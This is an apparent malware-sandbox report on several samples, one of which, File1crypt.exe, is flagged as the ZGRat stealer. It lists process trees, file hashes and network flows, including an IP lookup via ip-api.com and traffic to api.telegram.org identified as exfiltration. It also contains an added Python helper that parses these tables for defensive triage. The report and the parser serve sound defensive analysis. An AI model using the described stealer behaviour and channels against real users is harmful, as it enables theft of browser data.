win10v2004-20231222-en
Max time kernel
0s
Max time network
147s
Command Line
Signatures
Enumerates physical storage devices
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Pphucxdmff.dat
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k UnistackSvcGroup
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.194.73.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | | tcp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | 119.110.54.20.in-addr.arpa | udp |
| GB | 96.17.179.70:80 | | tcp |
| US | 8.8.8.8:53 | 70.179.17.96.in-addr.arpa | udp |
| GB | 96.17.179.68:80 | | tcp |
| GB | 96.17.179.68:80 | | tcp |
| GB | 96.17.179.83:80 | | tcp |
| US | 8.8.8.8:53 | | udp |
| GB | 96.17.179.83:80 | | tcp |
| GB | 96.17.179.83:80 | | tcp |
| GB | 96.17.179.83:80 | | tcp |
| GB | 96.17.179.83:80 | | tcp |
| GB | 96.17.179.83:80 | | tcp |
| GB | 96.17.179.83:80 | | tcp |
| GB | 96.17.179.83:80 | | tcp |
| GB | 96.17.179.83:80 | | tcp |
| GB | 96.17.179.83:80 | | tcp |
| GB | 96.17.179.83:80 | | tcp |
| GB | 96.17.179.83:80 | | tcp |
| GB | 96.17.179.83:80 | | tcp |
| GB | 96.17.179.83:80 | | tcp |
| GB | 96.17.179.83:80 | | tcp |
| GB | 96.17.179.83:80 | | tcp |
| GB | 96.17.179.83:80 | | tcp |
| GB | 96.17.179.83:80 | | tcp |
| GB | 96.17.179.83:80 | | tcp |
| GB | 96.17.179.83:80 | | tcp |
| GB | 96.17.179.83:80 | | tcp |
| GB | 96.17.179.83:80 | | tcp |
| US | 8.8.8.8:53 | 90.16.208.104.in-addr.arpa | udp |
| PL | 93.184.221.240:80 | | tcp |
Files
memory/4080-16-0x000002626A440000-0x000002626A450000-memory.dmp
memory/4080-36-0x00000262728E0000-0x00000262728E1000-memory.dmp
memory/4080-35-0x00000262727D0000-0x00000262727D1000-memory.dmp
memory/4080-34-0x00000262727D0000-0x00000262727D1000-memory.dmp
memory/4080-32-0x00000262727A0000-0x00000262727A1000-memory.dmp
memory/4080-0-0x000002626A340000-0x000002626A350000-memory.dmp
Analysis: behavioral18
Detonation Overview
Submitted
2024-01-19 20:19
Reported
2024-01-19 20:23
Platform
win10v2004-20231215-en
Max time kernel
130s
Max time network
153s
Command Line
Signatures
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\S: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\unregmp2.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\unregmp2.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\unregmp2.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Windows Media Player\wmplayer.exe
"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Wjwxkhbvw.mp4"
C:\Windows\SysWOW64\unregmp2.exe
"C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon
C:\Program Files (x86)\Windows Media Player\setup_wm.exe
"C:\Program Files (x86)\Windows Media Player\setup_wm.exe" /RunOnce:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Wjwxkhbvw.mp4"
C:\Windows\system32\unregmp2.exe
"C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT
Network
| Country | Destination | Domain | Proto |
| US | 138.91.171.81:80 | | tcp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.160.77.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.179.17.96.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\wmsetup.log
| MD5 | 3feb7dde744972cacd8d20fb8e1e6e17 |
| SHA1 | e2edfb90cda9fe0977d007ab88a4524d34be321b |
| SHA256 | c234ad4ac0971981297c69144e4b20511fe908d43943c252dfd7db780d2e194e |
| SHA512 | 3fa0a15376d5fdc383e353f7caf4595b276adcc8160e93e284751abd546a19ad067df0daf9095c2c7c7f9b5e1d459a740c76650d984005f51e8b62da22e49865 |
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML
| MD5 | 7050d5ae8acfbe560fa11073fef8185d |
| SHA1 | 5bc38e77ff06785fe0aec5a345c4ccd15752560e |
| SHA256 | cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b |
| SHA512 | a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b |
C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb
| MD5 | e8e36b528974f6fac920c0bb58e47f37 |
| SHA1 | 99c411cfc0f80d8be72717f04a276df466c87fd4 |
| SHA256 | 23471c2bf7b3025197d55fdf0cd28304cc7083ebc5d853b7f3515a265161855c |
| SHA512 | c0daf493dd6a5ad00094d10b7822f5e26c2dfcffdc72eb29c5b73f31d4ce5e7963c4e69a2d30e70edc72b4bf4425eebbc12844fa746b21b048f47ae60a2bce6f |
Analysis: behavioral19
Detonation Overview
Submitted
2024-01-19 20:19
Reported
2024-01-19 20:24
Platform
win10v2004-20231215-en
Max time kernel
138s
Max time network
166s
Command Line
Signatures
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\T: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\unregmp2.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\unregmp2.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\unregmp2.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Windows Media Player\wmplayer.exe
"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Wlkubkwdmop.mp4"
C:\Program Files (x86)\Windows Media Player\setup_wm.exe
"C:\Program Files (x86)\Windows Media Player\setup_wm.exe" /RunOnce:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Wlkubkwdmop.mp4"
C:\Windows\SysWOW64\unregmp2.exe
"C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon
C:\Windows\system32\unregmp2.exe
"C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT
Network
| Country | Destination | Domain | Proto |
| US | 138.91.171.81:80 | | tcp |
| US | 8.8.8.8:53 | 74.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.160.77.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.166.122.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.171.91.138.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\wmsetup.log
| MD5 | 28602f97dddaf89e2964b64eb3da1e2c |
| SHA1 | aecc3c7eb77847cb2da332dd52fc3fbe638ecc0a |
| SHA256 | 9ac1642d0a892ca08352f86e2af64b31d30cb9ec2d5878a79db9b5ca403f9f55 |
| SHA512 | 16c93c944f18ac8a3172f542d1672d129ba09ce5386a21d8aadd177f46cc9761650c596905f6897b5cfdafa7c94f0a950ba2937a92df2d013a937b6e301f5b5a |
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML
| MD5 | 7050d5ae8acfbe560fa11073fef8185d |
| SHA1 | 5bc38e77ff06785fe0aec5a345c4ccd15752560e |
| SHA256 | cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b |
| SHA512 | a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b |
C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb
| MD5 | 381fe4316fc3e55aa63d973eb0e3a051 |
| SHA1 | 50ee6ce6fc1ad75e433902d6778f53a3d5d4f539 |
| SHA256 | de432c8dd36f22ca2adacc09067f14a1dc91a7740c2ca455c3b8ba69587cca43 |
| SHA512 | e2f5d37cbc43193465e024210e3823b342ac6b9e4ffad3789b37d5a77f7f4df0f5c66988d75109cbb87838fdcacabde38598ebb23cfb56d6b47cea6fac51784a |
Analysis: behavioral6
Detonation Overview
Submitted
2024-01-19 20:19
Reported
2024-01-19 20:23
Platform
win10v2004-20231215-en
Max time kernel
141s
Max time network
157s
Command Line
Signatures
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\E: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\unregmp2.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\unregmp2.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\unregmp2.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Windows Media Player\wmplayer.exe
"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Evllmzg.wav"
C:\Program Files (x86)\Windows Media Player\setup_wm.exe
"C:\Program Files (x86)\Windows Media Player\setup_wm.exe" /RunOnce:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Evllmzg.wav"
C:\Windows\SysWOW64\unregmp2.exe
"C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon
C:\Windows\system32\unregmp2.exe
"C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.179.17.96.in-addr.arpa | udp |
| US | 20.231.121.79:80 | | tcp |
| US | 8.8.8.8:53 | wmploc.dll | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.160.77.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\wmsetup.log
| MD5 | 4c5d72dd01816b33209d4344acd68b7a |
| SHA1 | 0c008710af3e0c8c40a9ca53179a6e4ea52af789 |
| SHA256 | 28ae578bab0c7373335a84b701745d62693928cad75bf39c24f0c57d4f9fd94d |
| SHA512 | 7903dc52b64d25005ea4a7d37ebf96a0f1f40f8b349ebcf858db60aa0006176da65d66d71a5014b94c179e76c0cf54a2c650d36aaa15928c67ed5109daecd66d |
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML.bak
| MD5 | 7050d5ae8acfbe560fa11073fef8185d |
| SHA1 | 5bc38e77ff06785fe0aec5a345c4ccd15752560e |
| SHA256 | cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b |
| SHA512 | a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b |
C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb
| MD5 | fc240c081ec382df4b74d591d7d37a45 |
| SHA1 | 396e9d8accb2ff8b32e6c3957808cb87d23ad47c |
| SHA256 | 8cfeb277627a0fc9f2596c83dc37f9a3d8871293cd88dadd08f32098bf936038 |
| SHA512 | d8f83773c330b88b43f9ebc6220aa98368854e44a75b73a8575e7171f6c32e784d404e5a2e2e7787d3c71c0cfecdbb983631b639d9fee879b374d498d2ef0ab7 |
Analysis: behavioral7
Detonation Overview
Submitted
2024-01-19 20:19
Reported
2024-01-19 20:23
Platform
win10v2004-20231215-en
Max time kernel
112s
Max time network
131s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
(34 identical rows reported; the sandbox attaches no description, indicator, process or target to these matches)
ZGRat
Reads user/profile data of web browsers
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2192 set thread context of 4360 | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe
"C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe"
C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe
C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.179.17.96.in-addr.arpa | udp |
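Most rows in these Network tables are the sandbox's own resolver traffic and reverse lookups of addresses the guest touched; the lines that matter for this sample are the forward queries and the connections to ip-api.com (the external-IP lookup) and api.telegram.org (the exfiltration channel). The helper below is an added example, not the sandbox's own code: it parses the report's `| Country | Destination | Domain | Proto |` rows, tolerates extracted copies in which the empty Domain cell has been lost and the Proto value shifted left, drops resolver DNS and in-addr.arpa noise, and counts the remaining flows per endpoint. The sample rows are copied from the behavioral7 and behavioral12 tables; treating 8.8.8.8 as the sandbox resolver is an assumption read off those rows.

```python
"""Reduce a sandbox Network table to the names the sample resolved and the
connections it made, with per-endpoint counts."""
import re
from collections import Counter
from dataclasses import dataclass

RESOLVERS = {"8.8.8.8"}  # assumption: the sandbox's DNS forwarder, as seen in the rows

ROW = re.compile(r"^\|\s*([A-Z]{2})\s*\|\s*([0-9.]+):(\d+)\s*\|(.*)\|\s*$")

# Copied from the report; the rows with a trailing empty cell are the shifted layout.
NET_SAMPLE = """
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | udp | |
| GB | 96.17.179.83:80 | tcp | |
| GB | 96.17.179.83:80 | tcp | |
| GB | 96.17.179.83:80 | | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
""".strip().splitlines()


@dataclass(frozen=True)
class Flow:
    country: str
    ip: str
    port: int
    domain: str
    proto: str


def parse_flow(line):
    """Return a Flow for one table row, or None for the header and non-rows."""
    m = ROW.match(line.strip())
    if not m:
        return None
    cells = [c.strip() for c in m.group(4).split("|")]
    if cells and cells[0] in ("tcp", "udp"):  # shifted layout: Domain cell lost
        domain, proto = "", cells[0]
    else:                                      # well-formed: Domain, Proto
        domain = cells[0] if cells else ""
        proto = cells[1] if len(cells) > 1 else ""
    return Flow(m.group(1), m.group(2), int(m.group(3)), domain, proto)


def summarise(lines):
    """Return (queried, connections): forward names the sample resolved, and a
    Counter of (name-or-ip, ip:port, proto) for every flow that is not DNS to
    the resolver.  Reverse lookups are dropped as sandbox noise."""
    queried, connections = set(), Counter()
    for line in lines:
        flow = parse_flow(line)
        if flow is None:
            continue
        if flow.port == 53 and flow.ip in RESOLVERS:
            if flow.domain and not flow.domain.endswith(".in-addr.arpa"):
                queried.add(flow.domain)
            continue
        connections[(flow.domain or flow.ip, f"{flow.ip}:{flow.port}", flow.proto)] += 1
    return queried, connections


if __name__ == "__main__":
    names, conns = summarise(NET_SAMPLE)
    print("resolved:", sorted(names))
    for (name, endpoint, proto), n in conns.most_common():
        print(f"{n:3d}  {name:20s} {endpoint:22s} {proto}")
```

Endpoints that come out with only an IP as their name (52.142.223.178:80, 96.17.179.83:80 above) were reached without a preceding forward lookup in the table and need passive DNS or ASN context before being treated as sample-specific; the named pair ip-api.com / api.telegram.org is what to block and hunt for.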
Files
memory/2192-1-0x0000000074910000-0x00000000750C0000-memory.dmp
memory/2192-0-0x0000000000CB0000-0x0000000000DF6000-memory.dmp
memory/2192-2-0x0000000005940000-0x0000000005950000-memory.dmp
memory/2192-3-0x0000000005770000-0x00000000058A6000-memory.dmp
memory/2192-4-0x0000000005A90000-0x0000000005BC6000-memory.dmp
memory/2192-6-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-10-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-14-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-18-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-28-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-38-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-48-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-50-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-52-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-56-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-58-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-54-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-64-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-68-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-66-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-62-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-60-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-46-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-44-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-42-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-40-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-36-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-34-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-32-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-30-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-26-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-24-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-22-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-20-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-16-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-12-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-8-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-5-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-937-0x00000000017C0000-0x00000000017C1000-memory.dmp
memory/2192-939-0x0000000005C00000-0x0000000005C4C000-memory.dmp
memory/2192-938-0x0000000005CD0000-0x0000000005D9E000-memory.dmp
memory/2192-940-0x0000000006600000-0x0000000006BA4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\File1crypt.exe.log
| MD5 | 4a911455784f74e368a4c2c7876d76f4 |
| SHA1 | a1700a0849ffb4f26671eb76da2489946b821c34 |
| SHA256 | 264098e15b5b33d425f3b76e45b7976b58f917048125041135f7e60d8151108c |
| SHA512 | 4617591400409e1930195795a55e20d5f063042bb3e9fd1955099066e507b6ac8a1e3ae54cc42418e2639149b31bf7e58cd5743670d9030a15e29f14d813815d |
